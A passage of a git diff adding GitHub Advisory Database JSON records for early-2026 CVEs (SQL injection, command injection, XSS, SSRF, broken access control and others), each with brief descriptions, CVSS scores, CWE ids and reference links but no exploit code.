"https://patchstack.com/database/Wordpress/Plugin/wp-sms/vulnerability/wordpress-wp-sms-plugin-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json new file mode 100644 index 0000000000000..d1af0c5a66305 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwf8-6fj2-4vrx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2663" + ], + "details": "A security vulnerability has been detected in Alixhan xh-admin-backend up to 1.7.0. This issue affects some unknown processing of the file /frontend-api/system-service/api/system/role/query of the component Database Query Handler. Such manipulation of the argument prop leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2663" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json new file mode 100644 index 0000000000000..2160c1b380f06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwr9-9r33-h7x4", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2042" + ], + "details": "Nagios Host monitoringwizard Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the monitoringwizard module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28245.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2042" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-071" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json b/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json new file mode 100644 index 0000000000000..493e90832ff67 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rww7-gq38-qv2c/GHSA-rww7-gq38-qv2c.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rww7-gq38-qv2c", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-14270" + ], + "details": "The OneClick Chat to Order plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.0.9. This is due to the plugin not properly verifying that a user is authorized to perform an action in the wa_order_number_save_number_field function. This makes it possible for authenticated attackers, with Editor-level access and above, to modify WhatsApp phone numbers used by the plugin, redirecting customer orders and messages to attacker-controlled phone numbers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14270" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/862.html" + }, + { + "type": "WEB", + "url": "https://developer.wordpress.org/plugins/security/checking-user-capabilities" + }, + { + "type": "WEB", + "url": "https://developer.wordpress.org/plugins/security/nonces" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/tags/1.0.9/includes/multiple-numbers.php#L156" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/tags/1.0.9/includes/multiple-numbers.php#L26" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417664%40oneclick-whatsapp-order&new=3417664%40oneclick-whatsapp-order&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b4b5cc5e-af82-49e0-a0b5-d27c3631a102?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json new file mode 100644 index 0000000000000..1769c08ffd852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx38-cw65-cmwp", + "modified": "2026-02-20T00:31:53Z", + "published": "2026-02-20T00:31:53Z", + "aliases": [ + "CVE-2026-21535" + ], + "details": "Improper access control in Microsoft Teams allows an unauthorized attacker to disclose information over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21535" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21535" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T23:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json new file mode 100644 index 0000000000000..38c5ed7ac5e73 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx5p-47h9-9hv2/GHSA-rx5p-47h9-9hv2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx5p-47h9-9hv2", + "modified": "2026-02-21T06:30:16Z", + "published": "2026-02-21T06:30:16Z", + "aliases": [ + "CVE-2026-27534" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27534" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T05:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json new file mode 100644 index 0000000000000..e5740935841bc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rxjp-cgw5-jfcg/GHSA-rxjp-cgw5-jfcg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxjp-cgw5-jfcg", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26049" + ], + "details": "The web management interface of the device renders the passwords in a \nplaintext input field. The current password is directly visible to \nanyone with access to the UI, potentially exposing administrator \ncredentials to unauthorized observation via shoulder surfing, \nscreenshots, or browser form caching.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26049" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json new file mode 100644 index 0000000000000..4ccc37f3ebb29 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v36c-x4c4-8wx6/GHSA-v36c-x4c4-8wx6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v36c-x4c4-8wx6", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68022" + ], + "details": "Missing Authorization vulnerability in soporteblue Plugin BlueX for WooCommerce bluex-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Plugin BlueX for WooCommerce: from n/a through <= 3.1.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68022" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bluex-for-woocommerce/vulnerability/wordpress-plugin-bluex-for-woocommerce-plugin-3-1-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json new file mode 100644 index 0000000000000..60aa9141202ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3v9-r7ff-976x", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70149" + ], + "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70149" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70149-Membership-SQLi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json new file mode 100644 index 0000000000000..4638269f7db79 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v43p-pv9w-gqmf/GHSA-v43p-pv9w-gqmf.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v43p-pv9w-gqmf", + "modified": "2026-02-21T21:30:27Z", + "published": "2026-02-21T21:30:27Z", + "aliases": [ + "CVE-2026-2887" + ], + "details": "A security vulnerability has been detected in aardappel lobster up to 2025.4. This impacts the function lobster::TypeName in the library dev/src/lobster/idents.h. Such manipulation leads to uncontrolled recursion. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. Upgrading to version 2026.1 will fix this issue. The name of the patch is 8ba49f98ccfc9734ef352146806433a41d9f9aa6. It is advisable to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2887" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/issues/397#issuecomment-3849015088" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/commit/8ba49f98ccfc9734ef352146806433a41d9f9aa6" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster" + }, + { + "type": "WEB", + "url": "https://github.com/aardappel/lobster/releases/tag/v2026.1" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0204/blob/main/lob3/repro.lobster" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347181" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755026" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json b/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json new file mode 100644 index 0000000000000..6e0dbaec13c8d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v45v-r9m7-cwxg/GHSA-v45v-r9m7-cwxg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v45v-r9m7-cwxg", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25372" + ], + "details": "Missing Authorization vulnerability in Kodezen LLC Academy LMS academy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Academy LMS: from n/a through <= 3.5.3.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/academy/vulnerability/wordpress-academy-lms-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json new file mode 100644 index 0000000000000..4586864ee1ae4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4fw-f854-rf72", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2925" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_42B5A0 of the file /boafrm/formBridgeVlan of the component Bridge VLAN Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2925" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/20" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754497" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json new file mode 100644 index 0000000000000..728988ddf6b00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v534-r4rj-rcvf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68845" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Translations eDS Responsive Menu eds-responsive-menu allows Reflected XSS.This issue affects eDS Responsive Menu: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68845" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/eds-responsive-menu/vulnerability/wordpress-eds-responsive-menu-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json index 7618ec7972a42..82543f1d908da 100644 --- a/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json +++ b/advisories/unreviewed/2026/02/GHSA-v5g8-2q7f-c524/GHSA-v5g8-2q7f-c524.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json new file mode 100644 index 0000000000000..a388ec49baa9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v5q2-22j2-xvp3/GHSA-v5q2-22j2-xvp3.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5q2-22j2-xvp3", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69398" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Plank plank allows PHP Local File Inclusion.This issue affects Plank: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69398" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/plank/vulnerability/wordpress-plank-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json b/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json new file mode 100644 index 0000000000000..182d0a2ed7e47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6hg-mv73-76vg/GHSA-v6hg-mv73-76vg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6hg-mv73-76vg", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23803" + ], + "details": "Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through <= 1.2.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23803" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/smart-auto-upload-images/vulnerability/wordpress-smart-auto-upload-images-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json new file mode 100644 index 0000000000000..9bd6097cd90a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6m3-2f65-r5x7/GHSA-v6m3-2f65-r5x7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6m3-2f65-r5x7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-20761" + ], + "details": "A vulnerability exists in EnOcean SmartServer IoT version 4.60.009 and \nprior, which would allow remote attackers, in the LON IP-852 management \nmessages, to send specially crafted IP-852 messages resulting in \narbitrary OS command execution on the device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20761" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/DrftSSIoT/pages/1475410/SmartServer+IoT+Release+Notes#Current-Stable-Release" + }, + { + "type": "WEB", + "url": "https://enoceanwiki.atlassian.net/wiki/spaces/IEC/pages/288063529/Enhancing+Security" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-01.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json b/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json new file mode 100644 index 0000000000000..c2f7254e107ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6q3-r5cf-wh3r", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-8350" + ], + "details": "Execution After Redirect (EAR), Missing Authentication for Critical Function vulnerability in Inrove Software and Internet Services BiEticaret CMS allows Authentication Bypass, HTTP Response Splitting.This issue affects BiEticaret CMS: from 2.1.13 through 19022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8350" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0077" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T12:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json new file mode 100644 index 0000000000000..fc981e1d65c82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6x7-wpp7-g26g/GHSA-v6x7-wpp7-g26g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6x7-wpp7-g26g", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68853" + ], + "details": "Deserialization of Untrusted Data vulnerability in Kleor Contact Manager contact-manager allows Object Injection.This issue affects Contact Manager: from n/a through <= 9.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68853" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/contact-manager/vulnerability/wordpress-contact-manager-plugin-9-0-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json new file mode 100644 index 0000000000000..bc631b5fdc5cc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v754-wvf3-33xx", + "modified": 